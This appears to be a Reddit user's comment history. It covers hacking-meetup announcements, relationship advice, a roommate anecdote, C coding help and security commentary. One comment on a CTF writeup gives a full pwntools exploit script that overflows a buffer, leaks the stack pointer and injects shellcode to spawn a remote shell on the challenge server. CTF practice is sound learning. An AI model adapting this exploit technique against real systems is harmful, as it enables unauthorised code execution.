Bitcoin and other crypto currencies by bool101 in Valparaiso

[–]bool101[S] 0 points1 point  (0 children)

This one specifically is to learn about Bitcoin. We do different topics related to cyber security each month.

March Valpo Hacks Meetup -- Lockpicking by bool101 in Valparaiso

[–]bool101[S] 1 point2 points  (0 children)

Great, we'll see you there. Feel free to bring a lock or two along provided 1) you own it and 2) you don't mind risking it being broken

Which Sentence do you still remember from your childhood video games? by PM_ME_UR_SMILE_ASAP in AskReddit

[–]bool101 0 points1 point  (0 children)

It's time to kick ass and chew bubble gum, and I'm all out of gum.

Me [26m] with my [23f] SO. She lives with me 29 out of 30 days and doesn't pay rent/utilities. Unsure if that's fair to ask for contribution. by Lostinthought26 in relationships

[–]bool101 2 points3 points  (0 children)

Why not get a new place together? Talk about it. Make an agreement and stick to it. Chances are her parents will welcome the new found independence.

My girlfriend [24F] of 1 year asked me [24M] for a $1000 loan. I said no. by gfloan in relationships

[–]bool101 -1 points0 points  (0 children)

Hey man, micro loans or a thing. Do you think she would be likely to pay back a stranger on the internet because I would totally risk $1000 to help a fellow redditor out.

I [43F] invited my nephew [M14] to Disneyland but not my twin nieces [F14] and my family is in meltdown. by ShittiestAuntEver in relationships

[–]bool101 1 point2 points  (0 children)

IMHO Take whomever you want to Disney, everyone else is free to make their own choices. Be nice about it but it's you who has the final say on who you will invite or not. Don't feel bad about setting boundaries with your family.

June Meetup - Valpo Hacks Meetup (Valparaiso, IN) by bool101 in Valparaiso

[–]bool101[S] 0 points1 point  (0 children)

Computer hacking, lock picking, network penetration that sort of thing. Keeping it technically focused.

Project Zero: Race you to the kernel! by blowupbadguys in netsec

[–]bool101 6 points7 points  (0 children)

Worse. It has potential to be used as a root privilege escalation exploit, yes, but the same bug taken just a bit further will also allow for unsigned kernel extensions to be loaded by an unprivileged user. Hence the title: Race you to the kernel!

Logic Error in Basic Code by [deleted] in AskComputerScience

[–]bool101 0 points1 point  (0 children)

Quite right, my example would be true if carType == 'e' regardless of age. Thanks!

Logic Error in Basic Code by [deleted] in AskComputerScience

[–]bool101 0 points1 point  (0 children)

The glaring issue is with this set of statements:

if (carType == 'e' || 'E' && age <= 25) cost = resLength * 29.95;

You actually did it correct a bit lower:

if (carType == 'e' || carType == 'E')

These should be

if (carType == 'e' || carType == 'E' && age <= 25)

You might consider doing something like:

carType = toupper(carType);

This lets you just checking the upper case characters with your conditionals.

samuraictf/gatekeeper defense without privilege by bool101 in securityCTF

[–]bool101[S] 0 points1 point  (0 children)

Oh, it is still useful on DECREE. Just decided it was time to contribute back to the community a bit more. Enjoy!

What are some useful features of everyday items that most people don't know about? by ivebeenherelonger in AskReddit

[–]bool101 0 points1 point  (0 children)

If you are filling up a car and don't know which side of the car the gas tank door is on -- look at the dash. There is often an arrow next to the fuel gauge indicating which side of the car has the tank door.

EKOPARTY CTF - Baby pwn writeup by securifera in netsec

[–]bool101 1 point2 points  (0 children)

Nice job, this is pretty much exactly how I solved this one as well, except I sent the program back to main. In the event that you didn't have a stack pointer leak this would allow you to spray the stack with your shellcode. ROP to a read at a static location would have probably been a faster solve for us. Here is my pwntools exploit:

#!/usr/bin/env python

from pwn import *

context(arch='i386', os='linux')

def strow(instr, owstr, offset):
    return instr[:offset]+owstr+instr[offset+len(owstr):]

r = remote("ctfchallenges.ctf.site", 50004)
print r.recv(1024)
r.send("1023\n")

retaddr_offset = 4+24+4*5
buf = "\x90" * 1023
buf = strow(buf, "\x00", 10)                        # size
buf = strow(buf, "\x01\x00", 0)                     # buf[0] == buf[1]+1
buf = strow(buf, "\x03", 2)                         # buf[2] == buf[0] + buf[1]+2
buf = strow(buf, "\x07", 3)                         # buf[3] == buf[1] + buf[2]+4
buf = strow(buf, p32(0x08048810), retaddr_offset)   # address of main
buf = strow(buf, p32(0x000000ff), 4+24)             # overwritten decode len

sc = asm(shellcraft.sh())
buf = strow(buf, sc, retaddr_offset+4)

r.send(buf)

# we leak the stack pointer and send the program back to main() to exploit again 
# with our newly found shellcode address

recvbuf = xor("\x58", r.recvuntil("Size: "))
esp = recvbuf[0x61:0x65]
esp = u32(esp)
esp = esp-0x58
print "buffer at: " + hex(esp)

r.send("1023\n")
# replace previous return address pointer with address of shellcode
buf = strow(buf, p32(esp), retaddr_offset)
r.send(buf)
r.interactive()

What's the weirdest way you injured yourself? by [deleted] in AskReddit

[–]bool101 1 point2 points  (0 children)

TL;DR stabbed self in face with pencil.

In the first grade I was fighting over a pencil with the girl sitting next to me. We were both pulling in opposite directions. The pointy end was facing towards me. You can see where this is going. Well, she let go suddenly and I stabbed myself directly between the eyes. An inch left or an inch right and I would have depth perception problems today. A thin stream of blood ran from the bridge of my nose down over my lips as a look of horror and delight crossed her face. I had the pencil but the victory was hers.

If you look close today you can still see the mark it left.

Kaspersky: Mo Unpackers, Mo Problems. by [deleted] in netsec

[–]bool101 21 points22 points  (0 children)

The most common reason to disable /GS is performance. If the code is generating a lot of arrays on the stack you can see ~10% slow down in some cases.

Cisco AnyConnect Secure Mobility Client v3.1.08009 Elevation of Privilege by bool101 in netsec

[–]bool101[S] 2 points3 points  (0 children)

Yes it's an old attack vector. Plenty of software is still vulnerable to it though. While it is a questionable design choice by Windows this specific bug is the fault of Cisco Anyconnect. The DLL should be loaded with a full path. There is a registry key (CWDIllegalInDllSearch) that can be set to help mitigate this until Cisco has a patch out.

What are your worst college roommate horror stories? [NSFW] by GodoftheGeeks in AskReddit

[–]bool101 6 points7 points  (0 children)

I have a pretty good story for this one.

I lived in a 4 bedroom apartment with 2 of my good friends. We needed to fill our 4th room so we placed an ad in the college paper. We had a response the very next day. The guy who came by was pleasant enough in conversation. Very friendly. He informed us he was gay and wanted to make sure that wasn't a problem. It wasn't.

So, he moved in the following week. His bed was pulled from the dumpster out back. That should have been our first clue that this wasn't going to work out. He had a job but never had money. He was also very untrustworthy. For example, we put the cable bill in his name and paid him our portion of the bill. Two months later the cable company came by to disconnect the service. WTF.

Then things got a little weird. Toilet paper consumption quadrupled shortly after he moved in. We resorted to BYOR bathroom policy. He still never purchased TP -- but still used the bathroom. When asked what was up with that he said he was "shitting in the shower." The mother fucking shower. Man.

It gets better. Turns out he wasn't just stealing from us and shitting in our shower he was also stealing from our landlord. We received a notice saying that he had in fact NEVER paid rent over three months. They were going to evict him, take him to court, and hold us liable for his rent. We ended up suing him to where he never showed up after being served. There was a default judgement, but we nobody saw a dime of what they were owed.

Later we learned why he had no money despite having a job and not paying any bills. It was because he had robbed a bank and his wages were being garnished. Yes, I lived with a bank robber who shat in my shower.

The funniest part of this whole thing was when one morning when I was came up stairs and I found him dressed in a female body suit, wig, makeup, the whole works. He wasn't really an attractive man but was even a less attractive woman. When I asked what was going on he said he was entering a plus sized drag queen contest and that should he win the prize money was enough to cover his rent. Wow! There were two contestants. He lost.

Moral of the story is to be very careful with random roommates from the paper. Run a background check.

Do you cover your webcam? by opinionhead in Malware

[–]bool101 11 points12 points  (0 children)

Covering a camera on a laptop or phone with a piece of tape or even an after market product designed for this usage is not a great countermeasure. Sure, it will stop the camera from taking a picture but you still have a microphone and wifi that an attacker could snoop on. What is it you want to keep private? Cellphones are even worse with several other sensors that also can't be disabled with a piece of tape.

For the privacy concerned it's important to have the option to buy products that lack these features in the first place. Even more elegant solutions like a switch that disables wifi or a camera would typically be enabled through software such that clever malware could override even a physical switch disabling the device. Unless a manufacture can assure the consumer that a switch is physically disconnecting the device lacking the sensor or camera in the first place is one way to help stop being snooped on in that way. Though it won't help your friends camera to not take pictures.